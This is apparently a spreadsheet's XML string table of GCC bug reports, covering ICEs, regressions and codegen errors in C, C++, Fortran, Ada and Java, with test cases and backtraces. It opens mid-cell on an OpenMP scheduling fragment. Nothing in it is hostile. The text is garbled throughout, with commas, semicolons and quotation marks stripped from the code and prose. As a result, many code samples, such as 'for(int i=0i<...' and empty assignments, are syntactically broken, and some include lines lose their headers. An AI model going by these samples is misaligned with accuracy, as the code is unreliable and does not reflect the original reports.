ss &lt;&lt; time
ss &gt;&gt; str
//#pragma critical
{starttime[i]=str}
c=0
while(!isspace(placements[i][c]))
c++
if(strlen(placements[i].c_str())==c+1){
//#pragma critical
{placements[i]=}}
else{ 
//#pragma critical
{placements[i]=placements[i].substr(c+1strlen(placements[i].c_str())-c-1)}}
}}}
omp_set_num_threads(32)
#pragma omp parallel for private (spacescstrjflagf)
for(int i=0i&lt;jobs.max_size()i++){
spaces=0int c=0
str=
while (spaces&lt;2){
if(isspace(jobs[i][c]))spaces++c++}
flag=1
while(c&lt;=strlen(jobs[i].c_str())&amp;&amp;flag==1){
if(isspace(jobs[i][c])||c==strlen(jobs[i].c_str())){
f=0
for(int j=0j&lt;completed.max_size()j++){
if(completed[j]==atoi(str.c_str()))f=1}
if(f==0)flag=0}
else str+=jobs[i][c]c++}
if(flag==1){
//#pragma critical
{assignments.resize(assignments.max_size()+1)
assignments[assignments.max_size()-1]=i}}}
if(assignments.max_size()==0){jump=1goto p}
jump=0
if(assignments.max_size()&gt;machines.max_size()){
int minimization[assignments.max_size()][assignments.max_size()]
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=0i&lt;assignments.max_size()i++){
for(int j=machines.max_size()j&lt;assignments.max_size()j++){
//#pragma critical
{minimization[i][j]=0}}
}}
else{
int minimization[machines.max_size()][machines.max_size()]
omp_set_num_threads(32)
#pragma omp parallel for private (j)
for(int i=assignments.max_size()i&lt;machines.max_size()i++){
for(int j=0j&lt;machines.max_size()j++){
//#pragma critical
{minimization[i][j]=0}}
}}
vector flop(assignments.max_size())
int cumtimek
omp_set_num_threads(32)
#pragma omp parallel for private (cumtimejkscflop)
for(int i=0i&lt;machines.max_size()i++){
cumtime=0k=0
while(k&lt;balancetime[i].max_size()){
cumtime+=balancetime[i][k]k++
}
for(int j=0j&lt;assignments.max_size()j++){
if(i==0){
string s=jobs[assignments[j]]
//#pragma critical
{flop[j]=}
int c=0
while(!isspace(s[c])){
//#pragma critical
{flop[j]+=s[c]}
c++
}}
//#pragma critical
{minimization[j][i]=cumtime
startdelay[assignments[j]]=0}
if (startdelay[assignments[j]]&gt;cumtime){
//#pragma critical
{minimization[j][i]=startdelay[assignments[j]]}}
//#pragma critical
{minimization[j][i]+=ceil(atoi(flop[j].c_str())/machines[i])}
}}
goto q
}}</t>
  </si>
  <si>
    <t>anoop.sabir</t>
  </si>
  <si>
    <t>GCC-39379</t>
  </si>
  <si>
    <t>[4.4 Regression] DW_TAG_imported* no longer emitted</t>
  </si>
  <si>
    <t>// { dg-do compile }
// { dg-options -g -dA }
// { dg-final { scan-assembler DW_TAG_imported }  }
namespace A
{
  int v
}
int
f ()
{
  int i
  {
    using namespace A
    v++
    i = v - 1
  }
  return i
}
int
main ()
{
  using namespace A
  v++
  return v - 1
}
no longer emits any DW_TAG_imported* tags regression from 4.3.x.</t>
  </si>
  <si>
    <t>GCC-67199</t>
  </si>
  <si>
    <t>ICE with compile bug related to vector_size</t>
  </si>
  <si>
    <t>testcase:
__attribute__ ((vector_size (16))) g_73 = {0x15FE687EL 0x5827DF98L 0xF8411272L 0x235E695EL}
__attribute__ ((vector_size (16))) g_1124
int func_1(void)
{  
    __attribute__ ((vector_size (16))) l_1117 = {0x15FE688EL 0x5827DF98L 0xF8411272L 0x235E695EL}
    __attribute__ ((vector_size (16))) zhong = ( g_73 &lt;= g_73)
         g_1124 = (((g_73 &lt; l_1117) == (zhong)) &lt;&lt; 9)    
    return 0
}
the following issue can be reproduced  with -O2 when the gcc built on 64 bits system.
internal compiler error: in fold_convert_loc at fold-const.c:1974
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions</t>
  </si>
  <si>
    <t>zhongyunde</t>
  </si>
  <si>
    <t>GCC-942</t>
  </si>
  <si>
    <t>GCC 2.95.2 running as a native compiler on sun4m sparc under
Solaris 2.6 exits with ICE compiling legal code (pine4.30/imap/src/osdep/unix/mbx.c
from UW PINE 4.30).  The same code compiles and links to a
working executable using native sparc Solaris 2.6 gcc 2.8.1
but fails for gcc 2.95.1 as well.  The error occurs at all
levels of optimization from -O0 to -O6 (incl.) gcc 2.8.1
compiles the source successfully at all levels of optimization
(from -O0 to -O6 incl.).
The gcc 2.95.2 binaries were compiled on the same machine
using gcc 2.95.1 for the original bootstrap (make bootstrap-lean).
The sources were checked out from the public CVS repository at gnu.org using tag gcc-2_95_2-release:
cvs -z 9 -d :pserver:anoncvs@gcc.gnu.org:/cvs/gcc co -r gcc-2_95_2-release -P gcc
Could not attach the preprocessed source due to a bug in the
gnatsweb form...
The erroneous run produced the output included below:
Reading specs from local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2
/specs
gcc version 2.95.2 19991024 (release)
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/cpp -lang-c -v -D
__GNUC__=2 -D__GNUC_MINOR__=95 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__spar
c__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem
(unix) -Asystem(svr4) -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) mbx.c
mbx.i
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../sparc
-sun-solaris2.6/include
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../include/g++-3
End of omitted list.
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/cc1 mbx.i -quiet
-dumpbase mbx.c -version -o mbx.s
GNU C version 2.95.2 19991024 (release) (sparc-sun-solaris2.6) compiled by GNU C
 version 2.95.2 19991024 (release).
mbx.c: In function `mbx_hdrpos':
mbx.c:1371: internal error--unrecognizable insn:
(insn 102 100 104 (set (reg:SI 130)
        (minus:SI (const_int 4 [0x4])
            (const_int -4096 [0xfffff000]))) -1 (nil)
    (nil))
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS 5.6 Generic_105181-20 sun4m sparc SUNWSPARCstation-20
cpu0: TITMS390Z50 (mid 8 impl 0x0 ver 0x3 clock 50 MHz)
How-To-Repeat:
Use the preprocessed source attached to the message.</t>
  </si>
  <si>
    <t>GCC-35920</t>
  </si>
  <si>
    <t>Overriding primitive with a predefined operation renaming</t>
  </si>
  <si>
    <t>GNAT 4.4.0 (20080411) crashes when trying to override an inherited primitive operation by the renaming of a predefined one.
package P1 is
   type T1 is tagged null record
   function Something (X Y : T1) return Boolean
   type T2 is new T1 with null record
   function Something (X Y : T2) return Boolean renames =
end P1
% gcc -c p1.ads
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 20080411 (experimental) (x86_64-unknown-linux-gnu) Program_Error exp_disp.adb:6756 explicit raise|
| Error detected at p1.ads:5:50                                            |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
p1.ads
/local/x86_64-unknown-linux/lib/gcc/x86_64-unknown-linux-gnu/4.4.0/adainclude/s-parame.ads
[incidentally the path of s-parame.ads is bogus it lacks a /home/sam prefix]</t>
  </si>
  <si>
    <t>GCC-10018</t>
  </si>
  <si>
    <t>regression: bits/c++config.h: No such file or directory</t>
  </si>
  <si>
    <t>This source file:
  #include 
Gives this error:
  /berman/fsf/_today_/berman/install/target/native/gcc/gcc-3_3-branch-binutils-2.13.2.1/include/iosfwd:45:28: bits/c++config.h: No such file or directory
This worked with gcc gcc-3_3-branch%20030227.
Release:
gcc version 3.3 20030309 (prerelease)
Environment:
target=native host=i686-pc-linux-gnu osversion=red-hat-8.0
gcc=gcc-3_3-branch%20030308 binutils=2.13.2.1 glibc=2.2.93-5-rh
How-To-Repeat:
Compile the attached source file with gcc 3.3.</t>
  </si>
  <si>
    <t>GCC-43173</t>
  </si>
  <si>
    <t>Unnecessary array temporary: Passing contiguous array as actual argument</t>
  </si>
  <si>
    <t>Related to some other missed-optimization PRs but particularly simple.
  REAL allocatable :: ot(:)
  integer :: time_steps
  call foo (ot) ! OK no temporary
  call foo (ot(0:5:1)) ! Unnecessary temporary
  call foo (ot(0:time_steps)) ! Unnecessary temporary
  end
Note: ot is contiguous (as it is allocatable) stride = 1 and thus all arguments are simple contiguous - unless the stride is non-unity or one has e.g. ot( [135]).
Note 2: If one has an explicit-size array it works - there is no temporary for:
  REAL :: ot(5)
  integer :: time_steps
  call foo (ot(1:time_steps))
I think the issue is that one mixes up the (:) of an allocatable array with the (:) of a non-allocatable assumed-shape dummy argument or a pointer.
The temporary seems to be generated in trans-arrays.c's gfc_conv_array_parameter the issue seems to be that full_array_var is false and then later there is either no_pack or contiguous set to false.</t>
  </si>
  <si>
    <t>GCC-51334</t>
  </si>
  <si>
    <t>[OOP] ICE with type-bound operator: tree check: expected record_type or union_type or qual_union_type have function_type in gfc_conv_component_ref at fortran/trans-expr.c:556</t>
  </si>
  <si>
    <t>Created attachment 25938
Failing program
Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/d9df983132fcc643
Arjen Markus reports there that his program ICEs with GCC 4.6 it also does so with GCC the trunk. It does compile with ifort 12.1 (but not with 12.0) however there are unresolved symbols with ifort 12.1. It fails to compile with PGI 11.5 and crayftn 7.1.4.111 but those errors look bogus.
In gfortran 4.7:
Test.f90: In function â€˜test_pde_solverâ€™:
Test.f90:375:0: internal compiler error: tree check: expected record_type or union_type or qual_union_type have function_type in gfc_conv_component_ref at fortran/trans-expr.c:556
The line of interest is:
        deriv    = diff * solution%nabla2()
The ICE is in gfc_conv_component_ref debugging shows:
(gdb) p c-&gt;name
$2 = 0x2aaaacf09050 _vptr
(gdb) p debug_tree(decl)
 &lt;indirect_ref 0x2aaaacf1baa0
    type &lt;function_type 0x2aaaacf0e738
        type &lt;record_type 0x2aaaacf069d8 __class_base_pde_objects_Base_pde_object_a BLK
[...]
It looks as if the constructor patch causes the generation of a function decl instead of an record decl. However given that the problem also occurs with 4.7 there seems to be something else broken as well.</t>
  </si>
  <si>
    <t>GCC-1886</t>
  </si>
  <si>
    <t>Some .tcc files not includedImplementation missing for __basic_file template class.</t>
  </si>
  <si>
    <t>The instantiation of the std::basic_filebuf class produces
an instantiation of the internal std::__basic_file class.
However no implementation of the std::__basic_file class is
is included by the libstdc++ header files. This prevents the
user from defining new instantiations of the basic_filebuf
class.
The implementation does exist but is located in the file:
/gcc/libstdc++-v3/config/c_io_stdio.cc which only exists
within in the library source tree.
This seems strange as there doesn't really seem to be a 
connection between this .cc file and the .h file of the 
same name.
Release:
2.97 (latest)
Environment:
N/A
How-To-Repeat:
Instantiate the std::basic_filebuf using a character type
other than char or whar_t. A link will fail with unresolved
symbols declared by the __basic_file class.</t>
  </si>
  <si>
    <t>GCC-16406</t>
  </si>
  <si>
    <t>[3.4 Regression] USE_LD_AS_NEEDED undocumented</t>
  </si>
  <si>
    <t>The target macro USE_LD_AS_NEEDED added by
2004-04-23  Alan Modra  
        PR bootstrap/14992
        * gcc.c (init_gcc_specs): Test USE_LD_AS_NEEDED not HAVE_LD_AS_NEEDED.
        * config/linux.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/alpha/linux.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/arm/linux-elf.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/rs6000/linux.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/rs6000/linux64.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/sh/linux.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/sparc/linux.h (USE_LD_AS_NEEDED): Define.
        * gcc/config/sparc/linux64.h (USE_LD_AS_NEEDED): Define.
is undocumented.  This is a regression in 3.5.</t>
  </si>
  <si>
    <t>GCC-25637</t>
  </si>
  <si>
    <t>[3.4 regression] Member definition in wrong scope accepted</t>
  </si>
  <si>
    <t>The following two invalid code snippets are accepted by the C++ frontend
(the members of A cannot be defined in B):
===============================================
struct A { void foo() }
struct B { friend void A::foo() {} }
===============================================
===============================================
struct A { A() }
struct B { friend A::A() {} }
===============================================
Since the second code snippet was rejected in GCC 3.2.x and 3.3.x
(although with a bogus error message) this is regression.</t>
  </si>
  <si>
    <t>GCC-65192</t>
  </si>
  <si>
    <t>[avr-tiny] ICE in tiny_valid_direct_memory_access_range</t>
  </si>
  <si>
    <t>if configured with --enable-checking=all avr-gcc 5.0 fails to build libgcc for avrtiny:
conftest.c:11:1: internal compiler error: RTL check: expected elt 0 type 'e' or 'u' have 'i' (rtx reg) in tiny_valid_direct_memory_access_range at config/avr/avr.c:3228
 main ()
 ^
0x8721938 rtl_check_failed_type2(rtx_def const* int int int char const* int char const*)
	../../../gcc.gnu.org/trunk/gcc/rtl.c:722
0x8abfcac tiny_valid_direct_memory_access_range(rtx_def* machine_mode)
	../../../gcc.gnu.org/trunk/gcc/config/avr/avr.c:3228
0x8b08e6f gen_movsi(rtx_def* rtx_def*)
	../../../gcc.gnu.org/trunk/gcc/config/avr/avr.md:680
0x83fc788 insn_gen_fn::operator()(rtx_def* rtx_def*) const
	../../../gcc.gnu.org/trunk/gcc/recog.h:303
0x83fc788 emit_move_insn_1(rtx_def* rtx_def*)
	../../../gcc.gnu.org/trunk/gcc/expr.c:3546
0x83fcb6b emit_move_insn(rtx_def* rtx_def*)
	../../../gcc.gnu.org/trunk/gcc/expr.c:3641
0x82e3f23 init_set_costs()
	../../../gcc.gnu.org/trunk/gcc/cfgloopanal.c:371
0x87806ce backend_init_target
	../../../gcc.gnu.org/trunk/gcc/toplev.c:1717
0x87806ce initialize_rtl()
	../../../gcc.gnu.org/trunk/gcc/toplev.c:1820
0x84869ed init_function_start(tree_node*)
	../../../gcc.gnu.org/trunk/gcc/function.c:4892
0x830c3a6 cgraph_node::expand()
	../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:1857
0x830dca6 expand_all_functions
	../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:2006
0x830dca6 symbol_table::compile()
	../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:2359
0x830fa5c symbol_table::finalize_compilation_unit()
	../../../gcc.gnu.org/trunk/gcc/cgraphunit.c:2436
0x817d593 c_write_global_declarations()
	../../../gcc.gnu.org/trunk/gcc/c/c-decl.c:10803
Please submit a full bug report
with preprocessed source if appropriate.
This is because x = XEXP (op 0)  under the assumption that op is always MEM which is not the case.  It might also be REG or SUBREG.
BTW using tiny_valid_direct_memory_access_range or similar in insn condition in order to refuse some addresses is a bad approach.  Better use legitimate_address_p and similar hooks.</t>
  </si>
  <si>
    <t>GCC-4694</t>
  </si>
  <si>
    <t>ICE in check_final_variable_indirect_assignment()</t>
  </si>
  <si>
    <t>The test case below is distilled from the latest TreeMap code in classpath.
Release:
trunk
Environment:
in flux
How-To-Repeat:
// CheckFinalCrash.java:16: Internal compiler error in check_final_variable_indirect_assignment at java/parse.y:12655
class X
{
  Object o()
  {
    return null
  }
}
public class CheckFinalCrash
{
  final Object comparator
  public CheckFinalCrash(Object o)
  {
    comparator = o
  }
  public CheckFinalCrash(X x)
  {
    this(x.o())
  }
}</t>
  </si>
  <si>
    <t>GCC-40187</t>
  </si>
  <si>
    <t>c_f_pointer with stride in SHAPE</t>
  </si>
  <si>
    <t>Using a SHAPE with stride doesn't work with c_f_pointer doesn't work
(modified test case from the testsuite):
$ diff -u c_f_pointer_shape_tests_4.f03 ~/gcc/trunk/gcc/testsuite/gfortran.dg/c_f_pointer_shape_tests_2.f03
--- c_f_pointer_shape_tests_4.f03       2009-05-18 19:55:36.000000000 +0200
+++ /home/ig25/gcc/trunk/gcc/testsuite/gfortran.dg/c_f_pointer_shape_tests_2.f03        2007-11-17 17:27:32.000000000 +0100
@@ -2913 +2912 @@
     integer(c_int) value :: num_rows
     integer(c_int) value :: num_cols
     integer dimension(::) pointer :: myArrayPtr
-    integer(c_long_long) dimension(3) :: shape
+    integer(c_long_long) dimension(2) :: shape
     integer :: ij
     shape(1) = num_rows
-    shape(2) = -3
-    shape(3) = num_cols
-    call c_f_pointer(cPtr myArrayPtr shape(1:3:2))
+    shape(2) = num_cols
+    call c_f_pointer(cPtr myArrayPtr shape)
     do j = 1 num_cols
        do i = 1 num_rows
           if(myArrayPtr(ij) /= ((j-1)*num_rows)+(i-1)) call abort ()
$ gfortran ~/gcc/trunk/gcc/testsuite/gfortran.dg/c_f_pointer_shape_tests_2_driver.c c_f_pointer_shape_tests_4.f03
$ ./a.out
Aborted</t>
  </si>
  <si>
    <t>GCC-41900</t>
  </si>
  <si>
    <t>call *%esp shouldn't be generated because of CPU errata</t>
  </si>
  <si>
    <t>Hi
Intel P6 family of processors (Pentium Pro 2 3) have a bug in call *%esp instruction. The instruction should put current EIP to stack decrement ESP by 4 and jump to a value of ESP before the decrement. P6 processors will jump to the address after the decrement (so the will execute return address as code). See Pentium Pro errata 70 Pentium 2 errata A33 Pentium 3 errata E17.
Gcc generates call *%esp for this example when compiled with -O2 -fomit-frame-pointer -mpreferred-stack-boundary=2:
int main()
{
        volatile unsigned code = 0x000000c3
        ((void (*)(void))
        return 0
}
The code crashes when executed on P6 processor and executes correctly on other processors.
GCC shouldn't allow direct %esp register for call instruction. (addressing using %esp is fine).
---
Note: this bug comes from a piece of code used to call an arbitrary interrupt. I coded it as this. The call *%esp bug looks weird but is not an artifical example it comes from a real code that was written and used.
static void INTR(unsigned int_no)
{
        volatile unsigned code = 0xc300cd | (int_no &lt;&lt; 8)
        ((void (*)(void))
}</t>
  </si>
  <si>
    <t>GCC-51081</t>
  </si>
  <si>
    <t>[F03] Proc-pointer assignment: Rejects valid internal proc</t>
  </si>
  <si>
    <t>Trivial diagnostic bug.
Compiling with -std=2003 just prints:
  Error: Internal procedure 'int' is invalid
         in procedure pointer assignment at (1)
Expected: It mentions that it is actually valid in Fortran 2008 e.g.
  Error: Fortran 2008: Internal procedure 'int'
         in procedure pointer assignment at (1)
ptr =&gt; int
contains
  subroutine int()
  end subroutine int
end</t>
  </si>
  <si>
    <t>GCC-82719</t>
  </si>
  <si>
    <t>[PDT] ICE in transfer_expr at fortran/trans-io.c:2393</t>
  </si>
  <si>
    <t>While experimenting :
$ cat z1.f90
program p
   type t(a)
      integer len :: a
      character(len=a) :: c
   end type
   type(t(2)) :: x
   x = t(2'ab')
   print * x
end
$ gfortran-8-20171022 -c z1.f90
z1.f90:9:0:
    print * x
internal compiler error: in transfer_expr at fortran/trans-io.c:2393
0x78521e transfer_expr
        ../../gcc/fortran/trans-io.c:2393
0x784d2d transfer_expr
        ../../gcc/fortran/trans-io.c:2472
0x7881df gfc_trans_transfer(gfc_code*)
        ../../gcc/fortran/trans-io.c:2635
0x72f1c7 trans_code
        ../../gcc/fortran/trans.c:2024
0x785ca7 build_dt
        ../../gcc/fortran/trans-io.c:2028
0x72f1e7 trans_code
        ../../gcc/fortran/trans.c:1996
0x755edc gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6422
0x6e7f20 translate_all_program_units
        ../../gcc/fortran/parse.c:6088
0x6e7f20 gfc_parse_file()
        ../../gcc/fortran/parse.c:6291
0x72c62f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-5751</t>
  </si>
  <si>
    <t>Error in backward/tempbuf.h</t>
  </si>
  <si>
    <t>backward/tempbuf.h tries to pull get_temporary_buffer and return_temporary_buffer from namespace __gnu_cxx but they are in namespace std.
Release:
CVS HEAD
Environment:
Linux
How-To-Repeat:
Just try to include tempbuf.h.</t>
  </si>
  <si>
    <t>GCC-12070</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] ICE converting between double and long double with -msoft-float</t>
  </si>
  <si>
    <t>The following simple function (extracted from libstdc++-v3/libmath/stubs.c)
will get an internal compiler error.
extern double atan2(double double)
long double
atan2l(long double x long double y)
{
  return atan2((double) x (double) y)
}
The ICE occurs with x86 native on GNU/Linux with GCC 3.3.1 when invoked with
-msoft-float.  It does not ICE with GCC 2.95.3.  I haven't yet tried the HEAD
of the CVS trunk.</t>
  </si>
  <si>
    <t>dctaylor87</t>
  </si>
  <si>
    <t>GCC-42554</t>
  </si>
  <si>
    <t>Can't build GNAT tools</t>
  </si>
  <si>
    <t>While building gnatlink &amp; gnatmake for both i386 and x86_64 get
ld: duplicate symbol _system__secondary_stack__mark_idIP in ../rts/libgnat.a(s-secsta.o) and s-secsta.o
(and after fixing this s-exctab.o).
I suppose this is because of a change in Snow Leopard where an object can't be both explicitly present on the command line and in a static library? Though there are other objects explicitly mentioned eg s-stalib.o which don't have to be removed.
Anyway editing gcc/ada/gcc-interface/Makefile.in to remove s-exctab.o and s-secsta.o from GNATLINK_OBJS and GNATMAKE_OBJS does the trick see attached patch.</t>
  </si>
  <si>
    <t>GCC-29392</t>
  </si>
  <si>
    <t>Segfault on data character initialization</t>
  </si>
  <si>
    <t>$ cat a9.f90 
  character(LEN=2) :: a(2) 
  data ((a(I)(k:k)I=12)k=12) /4*'a'/ 
  IF (ANY(a.NE.aa)) CALL ABORT() 
  END 
$ gfortran a9.f90
 In file a9.f90:2
  data ((a(I)(k:k)I=12)k=12) /4*'a'/ 
                                   1
Warning: initialization string truncated to match variable at (1)
a9.f90:0: internal compiler error: Segmentation fault
The segfault happens at:
    at ../../trunk/gcc/fortran/data.c:194
194       memcpy (
#0  create_character_intializer (init=0xce48e0 ts=Variable ts is not available.
)
    at ../../trunk/gcc/fortran/data.c:194
#1  0x000000000040e511 in gfc_assign_data_value (lvalue=0xce3240 
    rvalue=0xce3e80 index=0x7fbfffeaa0) at ../../trunk/gcc/fortran/data.c:323
#2  0x0000000000448482 in traverse_data_var (var=0xcb1470 where=0xcb0f50)
    at ../../trunk/gcc/fortran/resolve.c:6094
#3  0x0000000000448293 in traverse_data_var (var=0xcb11b0 where=0xcb0f50)
    at ../../trunk/gcc/fortran/resolve.c:6146
#4  0x0000000000448293 in traverse_data_var (var=0xcb09f0 where=0xcb0f50)
    at ../../trunk/gcc/fortran/resolve.c:6146
#5  0x0000000000448e1f in resolve_types (ns=0xce2330)
    at ../../trunk/gcc/fortran/resolve.c:6240
#6  0x000000000044b75d in gfc_resolve (ns=0xce2330)
    at ../../trunk/gcc/fortran/resolve.c:6918
#7  0x0000000000440a68 in gfc_parse_file ()
    at ../../trunk/gcc/fortran/parse.c:3212
There we have:
(gdb) p rvalue-&gt;value.character.string
$4 = 0xcb0b30 a
(gdb) p len
$5 = -13513439
(gdb) p dest
$6 = 0xcb0450   
(gdb) p start
$7 = 13513439</t>
  </si>
  <si>
    <t>GCC-2867</t>
  </si>
  <si>
    <t>Koenig lookup bug</t>
  </si>
  <si>
    <t>This code:
	namespace N {
	    class A{}
	    template
	    void f( A ){}
	}
 	int main()
	{
	    N::A a
	    f(a)
	}
results in the error:
x1.cc: In function `int main()':
x1.cc:10: `f' undeclared (first use this function)
x1.cc:10: parse error before `&gt;' token
Release:
gcc version 3.0 20010517
Environment:
Configured with: ../gcc/configure i686-pc-linux-gnu --enable-shared --prefix=/opt --enable-languages=cc++f77
Thread model: single</t>
  </si>
  <si>
    <t>GCC-35888</t>
  </si>
  <si>
    <t>ICE: converting a concrete type into a classwide interface</t>
  </si>
  <si>
    <t>The following package spec
package B is
   type I is Interface
   type C is new I with null record
   function M return C
   X : I'Class := I'Class (M)
end B
triggers an infinite recursion in GNAT:
+===========================GNAT BUG DETECTED==============================+
| 4.4.0 20080409 (experimental) (i686-pc-linux-gnu) Storage_Error stack overflow (or erroneous memory access)|
| Error detected at b.ads:5:20                                             |</t>
  </si>
  <si>
    <t>GCC-30712</t>
  </si>
  <si>
    <t>[4.3 Regression] Failures related to SSE2 starting Feb 5th 2007</t>
  </si>
  <si>
    <t>I started to get failures bootstrapping trunk early this morning.  For example:
Executing on host: /u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/xgcc -B/u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/ /u01/var/tmp/gcc_trunk_svn/gcc/gcc/testsuite/gcc.target/i386/pr13366.c   -O -msse -fno-show-column -S  -o pr13366.s    (timeout = 300)
In file included from /u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/include/xmmintrin.h:1245^M
                 from /u01/var/tmp/gcc_trunk_svn/gcc/gcc/testsuite/gcc.target/i386/pr13366.c:4:^M
/u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/include/emmintrin.h:34: error: #error SSE2 instruction set not enabled
compiler exited with status 1
output is:
In file included from /u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/include/xmmintrin.h:1245
                 from /u01/var/tmp/gcc_trunk_svn/gcc/gcc/testsuite/gcc.target/i386/pr13366.c:4:
/u01/var/tmp/gcc_trunk_svn/gcc_20070206/gcc/include/emmintrin.h:34: error: #error SSE2 instruction set not enabled
FAIL: gcc.target/i386/pr13366.c (test for excess errors)
There were 13 new failures all SSE2 related which passed until this morning.  I'm assuming it is related to the check-ins from Harsha Jagasia.
Let me know if you need more information.
Brett Albertson</t>
  </si>
  <si>
    <t>GCC-21562</t>
  </si>
  <si>
    <t>[4.0 Regression] Quiet bad codegen (unrolling + tail call interaction)</t>
  </si>
  <si>
    <t>Compile the following with -O2 -funroll-loops and you get bad codegen.  An uninitilaized value
is used as pos in computing the store address for mr[pos]=1 at the top of the function.  The
first dump where it's wrong seems to be nrv.  If you unroll by hand it comes out correct.
extern int delta[8]
extern unsigned char board[421]
void
ping_recurse(int pos int mr[400]  int color)
{
  int k
  mr[pos] = 1
  for (k = 0 k &lt; 4 k++) {
    int apos = pos + delta[k]
    if (mr[apos] == 1 || board[apos] == color)
       ping_recurse(apos mr color)
  }
}
Beginning of codegen on darwin8:
_ping_recurse:
        mflr r0
        bcl 2031L00000000001$pb
L00000000001$pb:
        stmw r28-16(r1)
        mr r29r4
        mflr r31
        mr r28r5
        stw r08(r1)
        stwu r1-80(r1)
L25:
        addis r11r31ha16(L_delta$non_lazy_ptr-L00000000001$pb)
        slwi r2r302   &lt;&lt;&lt;&lt; R30 uninitiailized</t>
  </si>
  <si>
    <t>GCC-7472</t>
  </si>
  <si>
    <t>gcc 3.1.1 has problems with STL slist</t>
  </si>
  <si>
    <t>main.cpp:2: `slist' not declared
main.cpp: In function `int main()': 
main.cpp:5: `slist' undeclared (first use this function) 
main.cpp:5: (Each undeclared identifier is reported only once for each function  
   it appears in.) 
main.cpp:5: parse error before `&gt;' token
Release:
gcc version 3.1.1
Environment:
Linux version 2.4.18-4GB (root@Pentium.suse.de)
Configured with: ../gcc-3.1.1/configure --prefix=/home/goerzig/gcc-3.1.1 
Thread model: single
How-To-Repeat:
#include 
using std::slist
int main(void)
{
  slist s
  return 1
}</t>
  </si>
  <si>
    <t>steffen.goerzig</t>
  </si>
  <si>
    <t>GCC-52505</t>
  </si>
  <si>
    <t>[avr]: __memx address space reading unintentionally from RAM</t>
  </si>
  <si>
    <t>The __memx address space reader must determine at runtime from what memory area to read and what instruction to use. To read one byte ine sequence might look like:
	ld   r24Z
	sbrs r257
	lpm  r24Z
This is not correct because if the read is fram flash memory but the address taken as RAM address points to the I/O area the read might have an effect on I/O register for example clear a latch or buffer.</t>
  </si>
  <si>
    <t>GCC-11480</t>
  </si>
  <si>
    <t>std::unique calls predicate too many times</t>
  </si>
  <si>
    <t>Section 25.2.8 [lib.alg.unique] of the C++ standard says with
regard to the std::unique function template:
  Complexity:  If the range ( last - first) is not empty exactly
  ( last - first) - 1 applications of the corresponding predicate
  otherwise no applications of the predicate.
But as attached example demonstrates the g++ implementation invokes
the predicate once more than that if there are any duplicates.
The example prints out 10.  It should print 9.
The culprit is the definition of unique() in stl_algo.h which first
invokes adjacent_find in an effort to skip over any already-unique
items at the start of the sequence.  When unique_copy is called
it invokes the predicate again on two items that have already been
compared.
This was tested with gcc 3.2 but the 3.3 sources seem to
still have the bug.
------------------------------cut here------------------------------
#include 
#include 
int a[10] = { 1 2 3 3 4 5 5 6 7 9 }
static int compare_count = 0
bool compare(int a int b)
{
  compare_count++
  return a == b
}
int main()
{
  std::unique(a a+10 compare)
  std::cout &lt;&lt; compare_count &lt;&lt; std::endl
  return 0
}
------------------------------cut here------------------------------
Compiled with
  gcc -v x.cpp -lstdc++
Reading specs from /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-
solaris2.7/3.2/specs
Configured with: ../configure --prefix=/cpd/gnu/modules/gcc3.2 --enable-shared -
-with-as=/cpd/gnu/modules/gcc3.2/bin/as --with-ld=/cpd/gnu/modules/gcc3.2/bin/ld
Thread model: posix
gcc version 3.2
 /cpd/gnu/modules/gcc3.2/lib/gcc-lib/sparc-sun-solaris2.7/3.2/cc1plus -v -
D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -
Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -
D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -
D__PRAGMA_REDEFINE_EXTNAME -D__sparc -D__sun -D__unix -Asystem=unix -
Asystem=svr4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500 -
D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -
